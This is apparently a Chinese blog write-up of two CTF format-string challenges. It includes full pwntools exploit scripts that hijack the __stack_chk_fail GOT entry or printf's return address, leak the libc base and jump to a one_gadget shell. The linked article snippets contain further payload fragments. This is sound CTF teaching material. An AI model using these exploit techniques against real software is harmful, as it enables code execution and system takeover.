格式化字符串漏洞

最新推荐文章于 2024-02-21 20:04:45 发布
原创 最新推荐文章于 2024-02-21 20:04:45 发布 · 1.1k 阅读 · 18 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#安全 #网络安全

#题一

开启NX、Canary保护,64位,动态编译,IDA分析:

很明显存在格式化字符串漏洞,同时左边还有__stack_chk_fail函数

这边补充一个知识点

随机生成canary被改变后会退出程序,那它如何退出的呢,就是通过执行__stack_chk_fail函数退出程序

既然题目给了我们__stack_chk_fail函数的地址,又存在格式化字符串漏洞,那我们就可以通过

fmtstr_payload(偏移,{被修改的got表:改之后的地址})来将__stack_chk_fail函数的got地址修改为main函数地址,这样在canary被修改之后执行__stack_chk_fail函数退出程序时实际上就相当于返回了main函数

可以看到程序确实是将__stack_chk_fail函数的got地址修改成了fmt(main)函数地址

之后我们就可以再一次栈溢出泄露libc基址了

这边为什么不能是p64(elf.got['read'])+b'%7$s'呢?

首先在%7$s后面补四个a是为了让它变成八个字节,防止它影响后面泄露的地址

而将p64(elf.got['read'])放在b'%7$saaaa'后面是因为read函数的got表不一定有八个字节,p64的作用就是将它打包成八个字节,不够的补\x00,而printf函数会遇00截断,因此需要将p64(elf.got['read'])放在b'%7$saaaa'后面,防止printf函数被截断

运行一下脚本看看是否成功泄露基址:

可以看到我们也是成功泄露了基址

泄露出llibc基址之后我们就可以用onegadget(等同于execve)去做

先用指令:one_gadget libc库路径找一下偏移

一般情况下我们都选用第二个,因为要使用onegadget要满足其对应的条件,即某两个寄存器的值为空,第二个一般都满足,一会也会为大家调试查看是否满足使用条件

正常来说,脚本这样写是没有问题的,但是在后面第三次读入获取权限的时候就会发现报错了,这其实是因为我们第二次读入泄露地址的时候读入的字节不够多,导致没有覆盖掉canary,程序就正常运行结束,没有跳转到__stack_chk_fail函数,即main函数,我们也就不能再一次栈溢出,所以,我们需要再补充一些字节

这个().ljust的作用是补齐,图中的作用是不够0x50补齐00

随后我们发送第三次读入的rop链

pay=fmtstr_payload(6,{elf.got['__stack_chk_fail']:one_gadget})

将__stack_chk_fail函数的got地址修改为onegadget的地址

获取权限

exp:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
#p=remote("node4.buuoj.cn",29608)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=process("./pwn3")
elf=ELF("./pwn3")
def bug():
	gdb.attach(p)
	pause()
main=0x4011DD
pay=fmtstr_payload(6,{elf.got['__stack_chk_fail']:main})
#bug()
p.send(pay)

pay=(b'%7$saaaa'+p64(elf.got['read'])).ljust(0x50,b'\x00')
#bug()
p.send(pay)
#leek libc_base================================================
read_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['read']
print(hex(libc_base))
#==============================================================
one_gadget=libc_base+0xebcf5

pay=fmtstr_payload(6,{elf.got['__stack_chk_fail']:one_gadget})
p.send(pay)
p.interactive()

#题二

保护全开,64位,动态编译,IDA分析:

先读入四个字节,如果是yes,就打印printf函数地址,通过这个可以求libc基址

下面又读入0x100个字节,不能栈溢出,但是下面printf函数存在格式化漏洞

libc基址有了,格式化字符串漏洞可以利用,有的人就想像上一题一样,修改__stack_chk_fail函数的got地址,实际上这是不行的,因为本题保护全开,因此不能修改got表地址,那要怎么做呢?

先发送yes,求出基址,然后利用格式化字符串漏洞将printf返回地址改为onegadget,因为本题程序最后运行的函数就是printf函数

实操:

可以看到,打印出了两个地址,一个是libc地址,一个是栈地址,把地址接收一下求出基址

成功求出基址,那这个栈地址有什么用呢?由于本题开了pie,因此我们无法直接修改printf返回地址,但是我们可以算出这个栈地址与printf函数返回地址的偏移,然后相减求出printf函数返回地址,随后就可以将printf函数修改成onegadget

在gdb里找到printf的返回地址

计算偏移

获取权限

exp:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
#p=remote("node4.buuoj.cn",29608)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=process("./pwn4")
elf=ELF("./pwn4")
def bug():
	gdb.attach(p)
	pause()
p.recvuntil("lbs 6 or not 6\n")
p.send(str('yes'))

p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['printf']
print(hex(libc_base))

p.recvuntil("0x")
stack=int(p.recv(12),16)-8
print(hex(stack))


one_gadget=libc_base+0xebcf5
pay=fmtstr_payload(6,{stack:one_gadget})
bug()
p.send(pay)
p.interactive()

Pers1st.
关注
如何修复iOS端格式化字符串漏洞
Panwave的专栏
03-23 687
使用NSLog的%@参数代替%s参数,这可以使得输出一个NSString而不是一个C字符串。这样做可以自动解决格式注入问题,并且可以避免攻击者使用Format String漏洞来执行任意代码。在上述例子中,我们使用了%.50s格式化选项,它告诉printf只打印前50个字符,这样可以避免攻击者使用过长的格式串导致的溢出问题。如果需要使用C字符串,请使用下面这种方式来格式化,这可以避免攻击者使用Format String漏洞来执行任意代码。最好的方法是完全避免使用格式化字符串
格式化字符串漏洞利用
山高路远
04-10 1445
转载自ctf-wiki https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-example/ 格式化字符串漏洞利用 其实,在上一部分,我们展示了格式化字符串漏洞的两个利用手段 使程序崩溃,因为%s对应的参数地址不合法的概率比较大。 查看进程内容,根据%d,%f输出了栈上的内容。 下面我们会对于每一方面进行更加详细的解释。 程序崩溃 通常来说,利用格式化字符串漏洞使得程序崩溃是最为简单的利用方式,因为我们只需要输入若干个%s即可 %s%s%s%s%
格式化字符串漏洞总结
weixin_61283545的博客
05-11 1171
1.wiki overwrite ​ 这是一道很典型的题目,及修改不同地址的数值以到达目的,做这种题,对我来说会先gdb先跑一遍程序,发现有输入后又输出输入的字符时,基本可以判断为格式化字符类型大类。 知道了类型第一步便是找偏移,打开gdb,在printf处下断点,之后r程序,在输入数据格式差不多为aaaa%p%p%p%p%p%p%p这类格式来标记为标志位置,后c到printf输出的位置。找到printf函数第一参数的位置,及格式化字符串地址,再用fmtary就可以算出偏移(值得一提,在上次问学长的
格式化字符串漏洞(Format String Attack)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
03-22 816
格式化字符串漏洞(Format String Attack)
格式化字符串漏洞及利用_萌新食用
蚁景网安学院
06-10 943
Y格式化字符串漏洞及利用前言格式化字符串漏洞 具有 任意地址读,任意地址写。固定布局 ...
好好说话之格式化字符串漏洞利用
hollk’s blog
08-05 4813
编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 一、格式化字符串漏洞利用 格式化字符串漏洞两大利用手段: 是程序崩溃,因为%s对应的参数地址不合法的概率比较大 查看进程内容,根据%d,%f输出了栈上的内容 二、程序崩溃 一般输入若干个%s即可 %s%s%s%s%s%s%s%s%s%s%s%s%s%s 栈上不可能每个值都对应了合法地址,总会有某个地址可以使得程序崩溃,不能控制,但是可以玩坏。例如,如果远程服务有个格式化字符串漏洞,那么就可以攻击其可用性,使服务崩溃,进而使
详解格式化字符串漏洞利用
weixin_48066554的博客
12-12 5616
详解格式化字符串漏洞利用 ​ 最近看了很多格式化字符串漏洞利用的文章,发现写得都差那么点意思,所以决定自己写一篇,结合实例,好好地把这个知识点捋一捋。
Linux 二进制漏洞挖掘入门系列之(四)格式化字符串漏洞
个人笔记
01-12 945
目录0x10 简介0x20 任意地址读0x30 任意地址写 0x10 简介 格式化字符串主要是指printf、fprintf、sprintf等print函数。相信大多数人学习C语言的时候,第一次就用到了该函数,输出"Hello,world!" printf("Hello %s", "world!"); 这里的 %s 就是一个格式化参数,期望赋予一个存储地址,并打印此地址中存放的字符串。常用的格式...
栈上格式化字符串漏洞修改stack_checkfail
2301_81031055的博客
02-21 481
这一行pay=(b'%7$saaaa'+p64(elf.got['printf'])).ljust(0x100,b'\x00')后面的.ljust(0x100,b'\x00')是因为读入的字节较少,不足以覆盖canary的数值,所以在任意读入较大的数值就行。我们可以利用格式化字符串漏洞修改stack_chk_fail函数的got表使得程序继续进行,在这里,我们将stack_chk_fail函数改成fmt函数,然后通过格式化字符串漏洞去泄露libc基址。checksec指令查看。用64位IDA打开分析。
关于在栈上格式化字符串漏洞的利用方法
cainiao78777的博客
03-18 635
先说一下这个思路吧,就是通过两次格式化字符串漏洞,第一次泄露libc_base,以及栈里面的一个地址(任意)第二次修改printf的返回地址为one_gadget去getshell。
pwn刷题num26-----格式化字符串漏洞实现任意地址修改
tbsqigongzi的博客
04-27 593
BUUCTF-PWN-[第五空间2019 决赛]PWN5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后首先输入一个name 然后输入密码(passwd) 最后fail ida看一下伪代码 观察主函数,发现格式化字符串漏洞 printf(&buf);
利用格式化字符串漏洞实现任意地址读写
个人笔记
06-01 6232
理解格式化字符串漏洞关键还是在于理解栈空间布局,任意地址写初学者接触到可能较为抽象,但是结合栈空间布局以及格式化字符串的原理,详细我们就能对格式化字符串有个更加清晰的认知。如果能够复现上述漏洞案例,那么恭喜你,已经完成了 pwn 格式化字符串漏洞这一旅程。
手动构造格式化字符串payload
2302_79813730的博客
02-21 1523
pay=(b'%'+str(要改成的数).encode()+b'c%13(要改的栈地址的偏移)$hn').ljust(0x28,b'\x00')+p64(stack)#stack是要修改的栈地址。,明显存在格式化字符串漏洞,我们首先想到用格式化字符串漏洞去泄露函数地址利用libc,之后多次利用格式化字符串漏洞去更改地址为one_gadget。一般可修改返回地址:printf的返回地址,fmt的返回地址,main函数的返回地址(libc_start_main),但当溢出字节不够时,或者p,s被禁用(
英招杯pwn1(字符串格式化漏洞
qq_53928256的博客
11-16 570
第二个参数writes表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数改为system函数地址,就写成{printfGOT:systemAddress};可能需要修改8个字节的数据,太麻烦了!即可将puts函数的真实地址泄露出来,即可获得对应的libc版本和基址,方便我们后面的操作;生成随机数代码,通过ctypes包下的cdll来加载libc,这样才能执行libc下的函数。根据地址泄露我们已经能确定对应的libc版本,加载对应的libc,即可获得libc的基址。
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 3590
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64位fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修改地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞,64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
格式化字符漏洞
IT_huanhuan的博客
05-25 1817
格式化字符串是由普通字符(包括%)和转换规则构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换,然后将结果写入到输出流中。转换规则由可选的部分和必选部分组成。其中只有转换指示符type是必选部分,用来表示转换类型。用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f”然后 printf 函数会根据这个格式化字符串来解析对应的其他参数。
栈上格式化字符串漏洞总结
weixin_66751120的博客
02-04 3167
例如printf(s),这就是个漏洞函数,那么正确形式应该是printf('%s',s),即以字符串形式输出,那么存在漏洞的原因就是就是没有格式化字符,这时候如果我们在漏洞函数上边输入一个格式化字符,比如%p,那么就会泄露指定位置的地址。因为当程序进行printf函数时,第一个参数是格式化字符,来确定下面一个数据的打印形式。下面是一些格式化字符代表的意思。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值